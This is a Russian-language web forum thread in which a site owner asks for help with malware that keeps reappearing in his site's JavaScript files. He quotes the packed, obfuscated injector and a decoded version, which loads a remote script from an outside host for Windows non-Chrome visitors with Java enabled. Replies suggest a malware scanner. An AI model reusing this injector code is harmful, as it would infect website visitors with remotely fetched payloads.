Перейти к содержанию
FEAR93

Постоянно появляется вирус

Рекомендуемые сообщения

Добрый день. Последние месяцы Яндекс стал сообщать, что сайт заражен вирусом. Стал разбираться, вирус нашел, удалил. Но через время он начал появляться снова и снова, с новым именем и в других каталогах.

Код вируса




eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 e(8){j(5.c&&5.f){3 h=5.f(\'k\')[0];3 4=5.c(\'l\');4.d(\'o\',\'n/m\');4.d(\'8\',8);h.t(4)}}6 i(2){v 2.g("x")==-1}3 b="y://p.w.2/u";3 7="7";6 a(){3 2=9.q.r();j((i(2)&&2.g(7)!=-1)&&9.s()){e(b)}}a();',35,35,'||ua|var|script_tag|document|function|win|src|navigator|includeCounter|url|createElement|setAttribute|includeJavascript|getElementsByTagName|indexOf|head_tag|notChrome|if|head|script|javascript|text|type|letyky|userAgent|toLowerCase|javaEnabled|appendChild|89f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c695|return|pp|chrome|http'.split('|'),0,{}))
После расшифровки видим это






function includeJavascript(src) {
if (document.createElement && document.getElementsByTagName) {
var head_tag = document.getElementsByTagName('head')[0];
var script_tag = document.createElement('script');
script_tag.setAttribute('type', 'text/javascript');
script_tag.setAttribute('src', src);
head_tag.appendChild(script_tag)
}
}

function notChrome(ua) {
return ua.indexOf("chrome") == -1
}
var url = "http://letyky.pp.ua/89f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c695";
var win = "win";

function includeCounter() {
var ua = navigator.userAgent.toLowerCase();
if ((notChrome(ua) && ua.indexOf(win) != -1) && navigator.javaEnabled()) {
includeJavascript(url)
}
}
includeCounter();
Ссылка на этот скрипт может быть в любом из js файлов.

letyky.pp.ua пингуется. Но через браузер недоступен. Помогите найти дырку, через которую постоянно заливают этот скрипт.

Адрес сайта auroramarket.com

Пароли к фтп админке менял, результат не дало.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

и модулями варезными вы конечно не пользуетесь

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Конечно не пользуюсь. Либо бесплатные, либо покупаю. Если есть что-то конкретное - показывайте.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Много раз выручал этот скрипт http://www.revisium.com/ai/

только много ложных срабатываний

те файлы, на которые ругается нужно сравнить с оригинальными из сборки, и выпилить заразу

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Гость
Вы комментируете как гость. Если у вас есть аккаунт, пожалуйста, войдите
Ответить в этой теме...

×   Вы вставили контент с форматированием.   Удалить форматирование

  Разрешено использовать не более 75 смайлов.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.


  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.